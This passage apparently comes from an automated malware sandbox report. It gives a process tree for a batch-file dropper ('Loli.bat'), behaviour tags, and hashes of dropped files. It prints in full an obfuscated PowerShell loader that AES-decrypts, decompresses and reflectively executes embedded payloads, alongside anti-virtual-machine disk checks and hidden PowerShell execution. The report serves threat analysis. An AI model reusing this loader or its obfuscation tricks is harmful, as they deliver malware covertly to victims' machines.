- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:4624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:3828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1688
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:2960
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"5⤵PID:1384
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));5⤵PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3452 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:1064
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2368
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\DjGPQo.exe"C:\Windows\$nya-onimai2\DjGPQo.exe"2⤵
- Executes dropped EXE
PID:2324 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5108
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3472
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3848
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3928
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4076
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:3504
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1368
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2120
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:4704
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
PID:2524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f9473b5a292735eb63388f024419f671
SHA1a313f974a2d7f8266f68c452a853cde8dba3a28d
SHA2565a53dfd3670931d8d5610943c0e860ae2518298a889b803b628aa46f80ade07e
SHA51277f951fe0f51c4a5b952771bdd4f5a6f295b2508da96cd3960f63932cfd280f8cb290ffcbca12533d36945f549d4de037654af9e0e1caf90a0588dd601a6601e
-
Filesize
1KB
MD5e1c15d7791b65536820509298e68d8f4
SHA1617db44f9b0d82f5c9918f98e96ee94179a29b11
SHA256725b5041d79023220710218740241cd9edda721245ab283b33c0d13854d4984f
SHA51282c19b76e69b91af07d631b9e17f9f1632b90ca23c670076ee2190bf8f960313f0b2e3856f177f50e639e3f479fd809755b73a0c333365fc8532239f20bf9082
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.2MB
MD5d266b84f245e8de76e05e762e3b7cfca
SHA1ed75a3413e35ff95bb01a4027f38e2a0e22e2cae
SHA25626a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad
SHA512b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f